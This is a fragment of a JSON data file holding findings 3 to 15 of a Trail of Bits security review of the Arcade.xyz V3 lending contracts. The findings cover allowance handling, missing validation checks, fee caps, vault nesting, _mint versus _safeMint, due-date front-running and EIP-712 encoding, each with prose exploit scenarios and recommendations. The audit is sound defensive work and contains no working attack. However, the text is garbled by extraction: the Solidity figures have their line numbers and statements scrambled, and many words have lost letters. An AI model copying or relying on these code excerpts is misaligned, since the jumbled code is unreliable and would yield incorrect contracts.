'safeDecreaseAllowance' require( (value == 0) || (token.allowance(address(this), spender) == 0), \"SafeERC20: approve from non-zero to non-zero allowance\" ); _callOptionalReturn(token, abi.encodeWithSelector(token.approve.selector, Figure 3.2: The safeApprove function in openzeppelin-contracts/contracts/token/ERC20/utils/SafeERC20.sol An alternative way to mitigate the ERC-20 race condition is to use the increaseAllowance and decreaseAllowance functions to safely update allowances. These functions are widely used by the ecosystem and allow users to update approvals with less ambiguity. uint256 newAllowance = token.allowance(address(this), spender) + value; _callOptionalReturn(token, abi.encodeWithSelector(token.approve.selector, } ) internal { function safeDecreaseAllowance( function safeIncreaseAllowance( IERC20 token, address spender, uint256 value 59 60 61 62 63 64 65 spender, newAllowance)); 66 67 68 69 70 71 72 73 74 75 zero\"); 76 77 abi.encodeWithSelector(token.approve.selector, spender, newAllowance)); 78 79 uint256 newAllowance = oldAllowance - value; _callOptionalReturn(token, IERC20 token, address spender, uint256 value ) internal { unchecked { } } uint256 oldAllowance = token.allowance(address(this), spender); require(oldAllowance >= value, \"SafeERC20: decreased allowance below Figure 3.3: The safeIncreaseAllowance and safeDecreaseAllowance functions in openzeppelin-contracts/contracts/token/ERC20/utils/SafeERC20.sol 27 Arcade.xyz V3 Security Assessment Exploit Scenario Alice, the owner of an asset vault, sets up an approval of 1,000 for her external contract by calling callApprove. She later decides to update the approval amount to 1,500 and again calls callApprove. This second call reverts, which she did not expect. Recommendations Short term, take one of the following actions: Update the documentation to make it clear to users and other integrating smart contract developers that two transactions are needed to update allowances. Add two new functions in the AssetVault contract: callIncreaseAllowance and callDecreaseAllowance, which internally call SafeERC20.safeIncreaseAllowance and SafeERC20.safeDecreaseAllowance, respectively. Long term, when using external libraries/contracts, always ensure that they are being used correctly and that edge cases are explained in the documentation. 28 Arcade.xyz V3 Security Assessment", + "labels": [ + "Trail of Bits", + "Severity: Informational", + "Difficulty: Medium" + ] + }, + { + "title": "4. Risk of confusing events due to missing checks in whitelist contracts ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-07-arcade-securityreview.pdf", + "body": "The CallWhitelist contracts add and remove functions do not check whether the given call has been registered in the whitelist. As a result, add could be used to register calls that have already been registered, and remove could be used to remove calls that have never been registered; these types of calls would still emit events. For example, invoking remove with a call that is not in the whitelist would emit a CallRemoved event even though no call was removed. Such an event could confuse o-chain monitoring systems, or at least make it more dicult to retrace what happened by looking at the emitted event. 64 65 66 67 function add(address callee, bytes4 selector) external override onlyOwner { whitelist[callee][selector] = true; emit CallAdded(msg.sender, callee, selector); } Figure 4.1: The add function in arcade-protocol/contracts/vault/CallWhitelist.sol 75 76 77 78 function remove(address callee, bytes4 selector) external override onlyOwner { whitelist[callee][selector] = false; emit CallRemoved(msg.sender, callee, selector); } Figure 4.2: The remove function in arcade-protocol/contracts/vault/CallWhitelist.sol A similar problem exists in the CallWhitelistDelegation.setRegistry function. This function can be called to set the registry address to the current registry address. In that case, the emitted RegistryChanged event would be confusing because nothing would have actually changed. 85 86 87 88 89 function setRegistry(address _registry) external onlyOwner { registry = IDelegationRegistry(_registry); emit RegistryChanged(msg.sender, _registry); } 29 Arcade.xyz V3 Security Assessment Figure 4.3: The setRegistry function in arcade-protocol/contracts/vault/CallWhitelistDelegation.sol Arcade has explained that the owner of the whitelist contracts in Arcade V3 will be a (set of) governance contract(s), so it is unlikely that this issue will happen. However, it is possible, and it could be prevented by more validation. Exploit Scenario No calls have yet been added to the whitelist in CallWhitelist. Through the governance system, a proposal to remove a call with the address 0x1 and the selector 0x12345678 is approved. The proposal is executed, and CallWhitelist.remove is called. The transaction succeeds, and a CallRemoved event is emitted, even though the removed call was never in the whitelist in the rst place. Recommendations Short term, add validation to the add, remove, and setRegistry functions. For the add function, it should ensure that the given call is not already in the whitelist. For the remove function, it should ensure that the call is currently in the whitelist. For the setRegistry function, it should ensure that the new registry address is not the current registry address. Adding this validation will prevent confusing events from being emitted and ease the tracing of events in the whitelist over time. Long term, when dealing with function arguments, always ensure that all inputs are validated as tightly as possible and that the subsequent emitted events are meaningful. Additionally, consider setting up an o-chain monitoring system that will track important system events. Such a system will provide an overview of the events that occur in the contracts and will be useful when incidents occur. 30 Arcade.xyz V3 Security Assessment", + "labels": [ + "Trail of Bits", + "Severity: Low", + "Difficulty: High" + ] + }, + { + "title": "5. Missing checks of _exists() return value ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-07-arcade-securityreview.pdf", + "body": "The ERC-721 _exists() function returns a Boolean value that indicates whether a token with the specied tokenId exists. In two instances in Arcades codebase, the function is called but its return value is not checked, bypassing the intended result of the existence check. In particular, in the PromissoryNote.tokenURI() and VaultFactory.tokenURI() functions, _exists() is called before the URI for the tokenId is returned, but its return value is not checked. If the given NFT does not exist, the URI returned by the tokenURI() function will be incorrect, but this error will not be detected due to the missing return value check on _exists(). 165 function tokenURI(uint256 tokenId) public view override(INFTWithDescriptor, ERC721) returns (string memory) { 166 167 168 169 } _exists(tokenId); return descriptor.tokenURI(address(this), tokenId); Figure 5.1: The tokenURI function in arcade-protocol/contracts/PromissoryNote.sol 48 function tokenURI(address, uint256 tokenId) external view override returns (string memory) { 49 return bytes(baseURI).length > 0 ? string(abi.encodePacked(baseURI, tokenId.toString())) : \"\"; 50 } Figure 5.2: The tokenURI function in arcade-protocol/contracts/nft/BaseURIDescriptor.sol Exploit Scenario Bob, a developer of a front-end blockchain application that interacts with the Arcade contracts, develops a page that lists users' promissory notes and vaults with their respective URIs. He accidentally passes a nonexistent tokenId to tokenURI(), causing his application to show an incorrect or incomplete URI. 31 Arcade.xyz V3 Security Assessment Recommendations Short term, add a check for the _exists() functions return value to both of the tokenURI() functions to prevent them from returning an incomplete URI for nonexistent tokens. Long term, add new test cases to verify the expected return values of tokenURI() in all contracts that use it, with valid and invalid tokens as arguments. 32 Arcade.xyz V3 Security Assessment", + "labels": [ + "Trail of Bits", + "Severity: Informational", + "Difficulty: High" + ] + }, + { + "title": "6. Incorrect deployers in integration tests ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-07-arcade-securityreview.pdf", + "body": "The xture deployment function in the provided integration tests uses dierent signers for deploying the Arcade contracts before performing the tests. All Arcade contracts are meant to be deployed by the protocol team, except for vaults, which are deployed by users using the VaultFactory contract. However, in the xture deployment function, some contracts are deployed from the borrower account instead of the admin account. Some examples are shown in gure 6.1; however, there are other instances in which contracts are not deployed from the admin account. const whitelist = await deploy(\"CallWhitelist\", signers[0], const signers: SignerWithAddress[] = await ethers.getSigners(); const [borrower, lender, admin] = signers; 71 72 73 74 []); 75 76 77 signers[0], [BASE_URI]) 78 [vaultTemplate.address, whitelist.address, feeController.address, descriptor.address]); const vaultTemplate = await deploy(\"AssetVault\", signers[0], []); const feeController = await deploy(\"FeeController\", admin, []); const descriptor = await deploy(\"BaseURIDescriptor\", const vaultFactory = await deploy(\"VaultFactory\", signers[0], Figure 6.1: A snippet of the tests in arcade-protocol/test/Integration.ts Exploit Scenario Alice, a developer on the Arcade team, adds a new permissioned feature to the protocol. She adds the relevant integration tests for her feature, and all tests pass. However, because the deployer for the test contracts was not the admin account, those tests should have failed, and the contracts are deployed to the network with a bug. Recommendations Short term, correct all of the instances of incorrect deployers for the contracts in the integration tests le. 33 Arcade.xyz V3 Security Assessment Long term, add additional test cases to ensure that the account permissions in all deployed contracts are correct. 34 Arcade.xyz V3 Security Assessment", + "labels": [ + "Trail of Bits", + "Severity: Informational", + "Difficulty: High" + ] + }, + { + "title": "7. Risk of out-of-gas revert due to use of transfer() in claimFees ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-07-arcade-securityreview.pdf", + "body": "The VaultFactory.claimFees function uses the low-level transfer() operation to move the collected ETH fees to another arbitrary address. The transfer() operation sends only 2,300 units of gas with this operation. As a result, if the recipient is a contract with logic inside the receive() function, which would use extra gas, the operation will probably (depending on the gas cost) fail due to an out-of-gas revert. 194 195 196 197 198 199 function claimFees(address to) external onlyRole(FEE_CLAIMER_ROLE) { uint256 balance = address(this).balance; payable(to).transfer(balance); emit ClaimFees(to, balance); } Figure 7.1: The claimFees function in arcade-protocol/contracts/vault/VaultFactory.sol The Arcade team has explained that the recipient will be a treasury contract with no logic inside the receive() function, meaning the current use of transfer() will not pose any problems. However, if at some point the recipient does contain logic inside the receive() function, then claimFees will likely revert and the contract will not be able to claim the funds. Note, however, that the fees could be claimed by another address (i.e., the fees will not be stuck). The withdrawETH function in the AssetVault contract uses Address.sendValue instead of transfer(). function withdrawETH(address to) external override onlyOwner 223 onlyWithdrawEnabled nonReentrant { 224 225 226 227 228 // perform transfer uint256 balance = address(this).balance; payable(to).sendValue(balance); emit WithdrawETH(msg.sender, to, balance); } 35 Arcade.xyz V3 Security Assessment Figure 7.2: The withdrawETH function in arcade-protocol/contracts/vault/AssetVault.sol Address.sendValue internally uses the call() operation, passing along all of the remaining gas, so this function could be a good candidate to replace use of transfer() in claimFees. However, doing so could introduce other risks like reentrancy attacks. Note that neither the withdrawETH function nor the claimFees function is currently at risk of reentrancy attacks. Exploit Scenario Alice, a developer on the Arcade team, deploys a new treasury contract that contains an updated receive() function that also writes the received ETH amount into a storage array in the treasury contract. Bob, whose account has the FEE_CLAIMER_ROLE role in the VaultFactory contract, calls claimFees with the newly deployed treasury contract as the recipient. The transaction fails because the write to storage exceeds the passed along 2,300 units of gas. Recommendations Short term, consider replacing the claimFees functions use of transfer() with Address.sendValue; weigh the risk of possibly introducing vulnerabilities like reentrancy attacks against the benet of being able to one day add logic in the fee recipients receive() function. If the decision is to have claimFees continue to use transfer(), update the NatSpec comments for the function so that readers will be aware of the 2,300 gas limit on the fee recipient. Long term, when deciding between using the low-level transfer() and call() operations, consider how malicious smart contracts may be able to exploit the lack of limits on the gas available in the recipient function. Additionally, consider the likelihood that the recipient will be a smart wallet or multisig (or other smart contract) with logic inside the receive() function, as the 2,300 gas from transfer() might not be sucient for those recipients. 36 Arcade.xyz V3 Security Assessment", + "labels": [ + "Trail of Bits", + "Severity: Informational", + "Difficulty: High" + ] + }, + { + "title": "8. Risk of lost funds due to lack of zero-address check in functions ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-07-arcade-securityreview.pdf", + "body": "The VaultFactory.claimFees (gure 8.1), RepaymentController.redeemNote (gure 8.2), LoanCore.withdraw, and LoanCore.withdrawProtocolFees functions are all missing a check to ensure that the to argument does not equal the zero address. As a result, these functions could transfer funds to the zero address. 194 195 196 197 198 199 function claimFees(address to) external onlyRole(FEE_CLAIMER_ROLE) { uint256 balance = address(this).balance; payable(to).transfer(balance); emit ClaimFees(to, balance); } Figure 8.1: The claimFees function in arcade-protocol/contracts/vault/VaultFactory.sol function redeemNote(uint256 loanId, address to) external override { LoanLibrary.LoanData memory data = loanCore.getLoan(loanId); (, uint256 amountOwed) = loanCore.getNoteReceipt(loanId); if (data.state != LoanLibrary.LoanState.Repaid) revert address lender = lenderNote.ownerOf(loanId); if (lender != msg.sender) revert RC_OnlyLender(lender, msg.sender); uint256 redeemFee = (amountOwed * feeController.get(FL_09)) / 126 127 128 129 130 RC_InvalidState(data.state); 131 132 133 134 BASIS_POINTS_DENOMINATOR; 135 136 137 } loanCore.redeemNote(loanId, redeemFee, to); Figure 8.2: The redeemNote function in arcade-protocol/contracts/RepaymentController.sol Exploit Scenario A script that is used to periodically withdraw the protocol fees (calling LoanCore.withdrawProtocolFees) is updated. Due to a mistake, the to argument is left 37 Arcade.xyz V3 Security Assessment uninitialized. The script is executed, and the to argument defaults to the zero address, causing withdrawProtocolFees to transfer the protocol fees to the zero address. Recommendations Short term, add a check to verify that to does not equal the zero address to the following functions: VaultFactory.claimFees RepaymentController.redeemNote LoanCore.withdraw LoanCore.withdrawProtocolFees Long term, use the Slither static analyzer to catch common issues such as this one. Consider integrating a Slither scan into the projects CI pipeline, pre-commit hooks, or build scripts. 38 Arcade.xyz V3 Security Assessment", + "labels": [ + "Trail of Bits", + "Severity: Medium", + "Difficulty: High" + ] + }, + { + "title": "9. The maximum value for FL_09 is not set by FeeController ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-07-arcade-securityreview.pdf", + "body": "The FeeController constructor initializes all of the maximum values for the fees dened in the FeeLookups contract except for FL_09 (LENDER_REDEEM_FEE). Because the maximum value is not set, it is possible to set any amount, with no upper bound, for that particular fee. The lender's redeem fee is used in RepaymentControllers redeemNote function to calculate the fee paid by the lender to the protocol in order to receive their funds back. If the protocol team accidentally sets the fee to 100%, all of the users' funds to be redeemed would instead be used to pay the protocol. 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 constructor() { /// @dev Vault mint fee - gross maxFees[FL_01] = 1 ether; /// @dev Origination fees - bps maxFees[FL_02] = 10_00; maxFees[FL_03] = 10_00; /// @dev Rollover fees - bps maxFees[FL_04] = 20_00; maxFees[FL_05] = 20_00; /// @dev Loan closure fees - bps maxFees[FL_06] = 10_00; maxFees[FL_07] = 50_00; maxFees[FL_08] = 10_00; } Figure 9.1: The constructor in arcade-protocol/contracts/FeeController.sol function redeemNote(uint256 loanId, address to) external override { LoanLibrary.LoanData memory data = loanCore.getLoan(loanId); (, uint256 amountOwed) = loanCore.getNoteReceipt(loanId); 126 127 128 129 130 RC_InvalidState(data.state); 131 if (data.state != LoanLibrary.LoanState.Repaid) revert address lender = lenderNote.ownerOf(loanId); 39 Arcade.xyz V3 Security Assessment if (lender != msg.sender) revert RC_OnlyLender(lender, msg.sender); uint256 redeemFee = (amountOwed * feeController.get(FL_09)) / 132 133 134 BASIS_POINTS_DENOMINATOR; 135 136 137 } loanCore.redeemNote(loanId, redeemFee, to); Figure 9.2: The redeemNote function in arcade-protocol/contracts/RepaymentController.sol Exploit Scenario Charlie, a member of the Arcade protocol team, has access to the privileged account that can change the protocol fees. He wants to set LENDERS_REDEEM_FEE to 5%, but he accidentally types a 0 and sets it to 50%. Users can now lose half of their funds to the new protocol fee, causing distress and lack of trust in the team. Recommendations Short term, set a maximum boundary for the FL_09 fee in FeeControllers constructor. Long term, improve the test suite to ensure that all fee-changing functions test for out-of-bounds values for all fees, not just FL_02. 40 Arcade.xyz V3 Security Assessment", + "labels": [ + "Trail of Bits", + "Severity: Low", + "Difficulty: High" + ] + }, + { + "title": "10. Fees can be changed while a loan is active ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-07-arcade-securityreview.pdf", + "body": "All fees in the protocol are calculated using the current fees, as informed by the FeeController contract. However, fees can be changed by the team at any time, so the eective rollover and closure fees that the users will pay can change once their loans are already initialized; therefore, these fees are impossible to know in advance. For example, in the code shown in gure 10.1, the LENDER_INTEREST_FEE and LENDER_PRINCIPAL_FEE values are read when a loan is about to be repaid, but these values can be dierent from the values the user agreed to when the loan was initialized. The same can happen in OriginationController and other functions in RepaymentController. function _prepareRepay(uint256 loanId) internal view returns (uint256 LoanLibrary.LoanData memory data = loanCore.getLoan(loanId); if (data.state == LoanLibrary.LoanState.DUMMY_DO_NOT_USE) revert if (data.state != LoanLibrary.LoanState.Active) revert 149 amountFromBorrower, uint256 amountToLender) { 150 151 RC_CannotDereference(loanId); 152 RC_InvalidState(data.state); 153 154 155 156 terms.proratedInterestRate); 157 158 BASIS_POINTS_DENOMINATOR; 159 BASIS_POINTS_DENOMINATOR; 160 161 162 163 } LoanLibrary.LoanTerms memory terms = data.terms; uint256 interest = getInterestAmount(terms.principal, uint256 interestFee = (interest * feeController.get(FL_07)) / uint256 principalFee = (terms.principal * feeController.get(FL_08)) / amountFromBorrower = terms.principal + interest; amountToLender = amountFromBorrower - interestFee - principalFee; Figure 10.1: The _prepareRepay function in arcade-protocol/contracts/RepaymentController.sol 41 Arcade.xyz V3 Security Assessment Exploit Scenario Lucy, the lender, and Bob, the borrower, agree on the current loan conditions and fees at a certain point in time. Some weeks later, when the time comes to repay the loan, they learn that the protocol team decided to change the fees while their loan was active. Lucys earnings are now dierent from what she expected. Recommendations Short term, consider storing (for example, in the LoanTerms structure) the fee values that both counterparties agree on when a loan is initialized, and use those local values for the full lifetime of the loan. Long term, document all of the conditions that are agreed on by the counterparties and that should be constant during the lifetime of the loan, and make sure they are preserved. Add a specic integration or fuzzing test for these conditions. 42 Arcade.xyz V3 Security Assessment", + "labels": [ + "Trail of Bits", + "Severity: Low", + "Difficulty: High" + ] + }, + { + "title": "11. Asset vault nesting can lead to loss of assets ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-07-arcade-securityreview.pdf", + "body": "Allowing asset vaults to be nested (e.g., vault A is owned by vault B, and vault B is owned by vault X, etc.) could result in a situation in which multiple asset vaults own each other. This would result in a deadlock preventing assets in the aected asset vaults from ever being withdrawn again. Asset vaults are designed to hold dierent types of assets, including ERC-721 tokens. The ownership of an asset vault is tracked by an accompanying ERC-721 token that is minted (gure 11.1) when the asset vault is deployed through the VaultFactory contract. 164 (uint256) { 165 166 167 mintFee); 168 169 170 171 172 173 mintFee); 174 175 176 177 } function initializeBundle(address to) external payable override returns uint256 mintFee = feeController.get(FL_01); if (msg.value < mintFee) revert VF_InsufficientMintFee(msg.value, address vault = _create(); _mint(to, uint256(uint160(vault))); emit VaultCreated(vault, to); return uint256(uint160(vault)); if (msg.value > mintFee) payable(msg.sender).transfer(msg.value - Figure 11.1: The initializeBundle function in arcade-protocol/contracts/vault/VaultFactory.sol To add an ERC-721 asset to an asset vault, it needs to be transferred to the asset vaults address. Because the ownership of an asset vault is tracked by an ERC-721 token, it is possible to transfer the ownership of an asset vault to another asset vault by simply transferring the ERC-721 token representing vault ownership. To withdraw ERC-721 tokens from an asset vault, the owner (the holder of the asset vaults ERC-721 token) needs to 43 Arcade.xyz V3 Security Assessment enable withdrawals (using the enableWithdraw function) and then call the withdrawERC721 (or withdrawBatch) function. 121 122 123 124 150 151 152 153 154 155 156 function enableWithdraw() external override onlyOwner onlyWithdrawDisabled { withdrawEnabled = true; emit WithdrawEnabled(msg.sender); } Figure 11.2: The enableWithdraw function in arcade-protocol/contracts/vault/AssetVault.sol function withdrawERC721( address token, uint256 tokenId, address to ) external override onlyOwner onlyWithdrawEnabled { _withdrawERC721(token, tokenId, to); } Figure 11.3: The withdrawERC721 function in arcade-protocol/contracts/vault/AssetVault.sol Only the owner of an asset vault can enable and perform withdrawals. Therefore, if two (or more) vaults own each other, it would be impossible for a user to enable or perform withdrawals on the aected vaults, permanently locking all assets (ERC-721, ERC-1155, ERC-20, ETH) within them. The severity of the issue depends on the UI, which was out of scope for this review. If the UI does not prevent vaults from owning each other, the severity of this issue is higher. In terms of likelihood, this issue would require a user to make a mistake (although a mistake that is far more likely than the transfer of tokens to a random address) and would require the UI to fail to detect and prevent or warn the user from making such a mistake. We therefore rated the diculty of this issue as high. Exploit Scenario Alice decides to borrow USDC by putting up some of her NFTs as collateral: 1. Alice uses the UI to create an asset vault (vault A) and transfers ve of her CryptoPunks to the asset vault. 2. The UI shows that Alice has another existing vault (vault X), which contains two Bored Apes. She wants to use these two vaults together to borrow a higher amount of USDC. She clicks on vault A and selects the Add Asset option. 3. The UI shows a list of assets that Alice owns, including the ERC-721 token that represents ownership of vault X. Alice clicks on Add, the transaction succeeds, and the vault X NFT is transferred to vault A. Vault X is now owned by vault A. 44 Arcade.xyz V3 Security Assessment 4. Alice decides to add another Bored Ape NFT that she owns to vault X. She opens the vault X page and clicks on Add Assets, and the list of assets that she can add shows the ERC-721 token that represents ownership of vault A. 5. Alice is confused and wonders if adding vault X to vault A worked (step 3). She decides to add vault A to vault X instead. The transaction succeeds, and now vault A owns vault X and vice versa. Alice is now unable to withdraw any of the assets from either vault. Recommendations Short term, take one of the following actions: Disallow the nesting of asset vaults. That is, prevent users from being able to transfer ownership of an asset vault to another asset vault. This would prevent the issue altogether. If allowing asset vaults to be nested is a desired feature, update the UI to prevent two or more asset vaults from owning each other (if it does not already do so). Also, update the documentation so that other integrating smart contract protocols are aware of the issue. Long term, when dealing with the nesting of assets, consider edge cases and write extensive tests that ensure these edge cases are handled correctly and that users do not lose access to their assets. Other than unit tests, we recommend writing invariants and testing them using property-based testing with Echidna. 45 Arcade.xyz V3 Security Assessment", + "labels": [ + "Trail of Bits", + "Severity: Low", + "Difficulty: High" + ] + }, + { + "title": "12. Risk of locked assets due to use of _mint instead of _safeMint ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-07-arcade-securityreview.pdf", + "body": "The asset vault and promissory note ERC-721 tokens are minted via the _mint function rather than the _safeMint function. The _safeMint function includes a necessary safety check that validates a recipient contracts ability to receive and handle ERC-721 tokens. Without this safeguard, tokens can inadvertently be sent to an incompatible contract, causing them, and any assets they hold, to become irretrievable. 164 (uint256) { 165 166 167 mintFee); 168 169 170 171 172 173 mintFee); 174 175 176 177 } function initializeBundle(address to) external payable override returns uint256 mintFee = feeController.get(FL_01); if (msg.value < mintFee) revert VF_InsufficientMintFee(msg.value, address vault = _create(); _mint(to, uint256(uint160(vault))); emit VaultCreated(vault, to); return uint256(uint160(vault)); if (msg.value > mintFee) payable(msg.sender).transfer(msg.value - Figure 12.1: The initializeBundle function in arcade-protocol/contracts/vault/VaultFactory.sol function mint(address to, uint256 loanId) external override returns (uint256) if (!hasRole(MINT_BURN_ROLE, msg.sender)) revert 135 { 136 PN_MintingRole(msg.sender); 137 138 139 140 return loanId; _mint(to, loanId); } Figure 12.2: The mint function in arcade-protocol/contracts/PromissoryNote.sol 46 Arcade.xyz V3 Security Assessment The _safeMint functions built-in safety check ensures that the recipient contract has the necessary ERC721Receiver implementation, verifying the contracts ability to receive and manage ERC-721 tokens. 258 259 260 261 262 263 264 265 266 267 268 function _safeMint( address to, uint256 tokenId, bytes memory _data ) internal virtual { _mint(to, tokenId); require( _checkOnERC721Received(address(0), to, tokenId, _data), \"ERC721: transfer to non ERC721Receiver implementer\" ); } Figure 12.3: The _safeMint function in openzeppelin-contracts/contracts/token/ERC721/ERC721.sol The _checkOnERC721Received method invokes the onERC721Received method on the receiving contract, expecting a return value containing the bytes4 selector of the onERC721Received method. A successful pass of this check implies that the contract is indeed capable of receiving and processing ERC-721 tokens. The _safeMint function does allow for reentrancy through the calling of _checkOnERC721Received on the receiver of the token. However, based on the order of operations in the aected functions in Arcade (gures 12.1 and 12.2), this poses no risk. Exploit Scenario Alice initializes a new asset vault by invoking the initializeBundle function of the VaultFactory contract, passing in her smart contract wallet address as the to argument. She transfers her valuable CryptoPunks NFT, intended to be used for collateral, to the newly created asset vault. However, she later discovers that her smart contract wallet lacks support for ERC-721 tokens. As a result, both her asset vault token and the CryptoPunks NFT become irretrievable, stuck within her smart wallet contract due to the absence of a mechanism to handle ERC-721 tokens. Recommendations Short term, use the _safeMint function instead of _mint in the PromissoryNote and VaultFactory contracts. The _safeMint function includes vital checks that ensure the recipient is equipped to handle ERC-721 tokens, thus mitigating the risk that NFTs could become frozen. Long term, enhance the unit testing suite. These tests should encompass more negative paths and potential edge cases, which will help uncover any hidden vulnerabilities or bugs like this one. Additionally, it is critical to test user-provided inputs extensively, covering a 47 Arcade.xyz V3 Security Assessment broad spectrum of potential scenarios. This rigorous testing will contribute to building a more secure, robust, and reliable system. 48 Arcade.xyz V3 Security Assessment", + "labels": [ + "Trail of Bits", + "Severity: Medium", + "Difficulty: Low" + ] + }, + { + "title": "13. Borrowers cannot realize full loan value without risking default ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-07-arcade-securityreview.pdf", + "body": "To fully capitalize on their loans, borrowers need to retain their loaned assets and the owed interest for the entire term of their loans. However, if a borrower waits until the loans maturity date to repay it, they become immediately vulnerable to liquidation of their collateral by the lender. As soon as the block.timestamp value exceeds the dueDate value, a lender can invoke the claim function to liquidate the borrowers collateral. 293 294 295 // First check if the call is being made after the due date. uint256 dueDate = data.startDate + data.terms.durationSecs; if (dueDate >= block.timestamp) revert LC_NotExpired(dueDate); Figure 13.1: A snippet of the claim function in arcade-protocol/contracts/LoanCore.sol Owing to the inherent nature of the blockchain, achieving precise synchronization between the block.timestamp and the dueDate is practically impossible. Moreover, repaying a loan before the dueDate would result in a loss of some of the loans inherent value because the protocols interest assessment design does not refund any part of the interest for early repayment. In a scenario in which block.timestamp is greater than dueDate, a lender can preempt a borrowers loan repayment attempt, invoke the claim function, and liquidate the borrowers collateral. Frequently, collateral will be worth more than the loaned assets, giving lenders an incentive to do this. Given the protocols interest assessment design, the Arcade team should implement a grace period following the maturity date where no additional interest is expected to be assessed beyond the period agreed to in the loan terms. This buer would give the borrower an opportunity to fully capitalize on the term of their loan without the risk of defaulting and losing their collateral. 49 Arcade.xyz V3 Security Assessment Exploit Scenario Alice, a borrower, takes out a loan from Eve using Arcades NFT lending protocol. Alice deposits her rare CryptoPunk as collateral, which is more valuable than the assets loaned to her, so that her position is over-collateralized. Alice plans to hold on to the lent assets for the entire duration of the loan period in order to maximize her benet-to-cost ratio. Eve, the lender, is monitoring the blockchain for the moment when the block.timestamp is greater than or equal to the dueDate so that she can call the claim function and liquidate Alices CryptoPunk. As soon as the loan term is up, Alice submits a transaction to the repay function, and Eve front-runs that transaction with her own call to the claim function. As a result, Eve is able to liquidate Alices CryptoPunk collateral. Recommendations Short term, introduce a grace period after the loan's maturity date during which the lender cannot invoke the claim function. This buer would give the borrower sucient time to repay the loan without the risk of immediate collateral liquidation. Long term, revise the protocol's interest assessment design to allow a portion of the interest to be refunded in cases of early repayment. This change could reduce the incentive for borrowers to delay repayment until the last possible moment. Additionally, provide better education for borrowers on how the lending protocol works, particularly around critical dates and actions, and improve communication channels for borrowers to raise concerns or seek clarication. 50 Arcade.xyz V3 Security Assessment", + "labels": [ + "Trail of Bits", + "Severity: Medium", + "Difficulty: Low" + ] + }, + { + "title": "14. itemPredicates encoded incorrectly according to EIP-712 ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-07-arcade-securityreview.pdf", + "body": "The itemPredicates parameter is not encoded correctly, so the signer cannot see the verier address when signing. The verier address receives each batch of listed assets to check them for correctness and existence, which is vital to ensuring the security and integrity of the lending transaction. According to EIP-712, structured data should be hashed in conjunction with its typeHash. The following is the hashStruct function as dened in EIP-712: hashStruct(s : ) = keccak256(typeHash encodeData(s)) where typeHash = keccak256(encodeType(typeOf(s))) In the protocol, the recoverItemsSignature function hashes an array of Predicate[] structs that are passed in as the itemPredicates argument. The function encodes and hashes the array without adding the Predicate typeHash to each member of the array. The hashed output of that operation is then included in the _ITEMS_TYPEHASH variable as a bytes32 type, referred to as itemsHash. 208 209 210 211 212 213 214 (bytes32 sighash, address externalSigner) = recoverItemsSignature( loanTerms, sig, nonce, neededSide, keccak256(abi.encode(itemPredicates)) ); Figure 14.1: A snippet of the initializeLoanWithItems function in arcade-protocol/contracts/OriginationController.sol keccak256( bytes32 private constant _ITEMS_TYPEHASH = 85 86 87 88 proratedInterestRate,uint256 principal,address collateralAddress,bytes32 itemsHash,address payableCurrency,bytes32 affiliateCode,uint160 nonce,uint8 side)\" 89 // solhint-disable max-line-length \"LoanTermsWithItems(uint32 durationSecs,uint32 deadline,uint160 ); 51 Arcade.xyz V3 Security Assessment Figure 14.2: The _ITEMS_TYPEHASH variable in arcade-protocol/contracts/OriginationController.sol However, this method of encoding an array of structs is not consistent with the EIP-712 guidelines, which stipulates the following: The array values are encoded as the keccak256 hash of the concatenated encodeData of their contents (i.e., the encoding of SomeType[5] is identical to that of a struct containing ve members of type SomeType). The struct values are encoded recursively as hashStruct(value). This is undened for cyclical data. Therefore, the protocol should iterate over the itemPredicates array, encoding each Predicate instance separately with its respective typeHash. Exploit Scenario Alice creates a loan oering that takes CryptoPunks as collateral. She submits the loan terms to the Arcade protocol. Bob, a CryptoPunk holder, navigates the Arcade UI to accept Alices loan terms. An EIP-712 signature request appears in MetaMask for Bob to sign. Bob cannot validate whether the message he is signing uses the CryptoPunk verier contract because that information is not included in the hash. Recommendations Short term, adjust the encoding of itemPredicates to comply with EIP-712 standards. Have the code iterate through the itemPredicates array and encode each Predicate instance separately with its associated typeHash. Additionally, refactor the _ITEMS_TYPEHASH variable so that the Predicate typeHash denition is appended to it and replace the bytes32 itemsHash parameter with Predicate[] items. This revision will allow the signer to see the verier address of the message they are signing, ensuring the validity of each batch of items, in addition to complying with the EIP-712 standard. Long term, strictly adhere to established Ethereum protocols such as EIP-712. These standards exist to ensure interoperability, security, and predictable behavior in the Ethereum ecosystem. Violating these norms can lead to unforeseen security vulnerabilities. 52 Arcade.xyz V3 Security Assessment", + "labels": [ + "Trail of Bits", + "Severity: Low", + "Difficulty: Low" + ] + }, + { + "title": "15. The fee values can distort the incentives for the borrowers and lenders ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-07-arcade-securityreview.pdf", + "body": "Arcade V3 contains nine fee settings. Six of these fees are to be paid by the lender, two are to be paid by the borrower, and the remaining fee is to be paid by the borrower if they decide to mint a new vault for their collateral. Depending on the values of these settings, the incentives can change for both loan counterparties. For example, to create a new loan, both the borrower and lender have to pay origination fees, and eventually, the loan must be rolled over, repaid, or defaulted. In the rst case, both the new lender and borrower pay rollover fees; note that the original lender pays no fees at all for closing the loan. In the second case, the lender pays interest fees and principal fees on closing the loan. Finally, if the loan is defaulted, the lender pays a default fee to liquidate the collateral. The various fees paid based on the outcome of the loan can result in an interesting incentive game for investors in the protocol, depending on the actual values of the fee settings. If the lender rollover fee is cheaper than the origination fee, investors may be incentivized to roll over existing loans instead of creating new ones, beneting the original lenders by saving them the closing fees, and harming the borrowers by indirectly raising the interest rates to compensate. Similarly, if the lender rollover fees are higher than the closing fees, lenders will be less incentivized to rollover loans. In summary, having such ne control over possible fee settings introduces hard-to-predict incentives scenarios that can scare users away or cause users who do not account for fees to inadvertently lose prots. Recommendations Short term, clearly inform borrowers and lenders of all of the existing fees and their current values at the moment 